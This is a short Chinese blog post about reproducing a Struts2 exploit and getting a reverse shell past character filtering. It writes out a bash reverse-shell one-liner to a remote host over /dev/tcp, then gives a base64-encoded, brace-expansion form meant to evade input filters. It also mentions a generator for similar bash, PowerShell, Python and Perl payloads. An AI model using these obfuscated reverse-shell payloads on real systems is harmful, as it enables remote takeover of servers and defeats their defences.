0x01
在复现struts2
遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"
、<>
等字符出现了问题。
0x02
经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 0>&1'
就可以用bash -c {echo,YmFzaCAtYyAnc2ggLWkgPiYgL2Rldi90Y3AvMS4xLjEuMS82NjYgMD4mMSc=}|{base64,-d}|{bash,-i}
绕过
0x03
当然,方式有多重,这里简单的写了一个网页来生成这些payload,不仅可以生成bash,powershell,python,perl都支持。
发表评论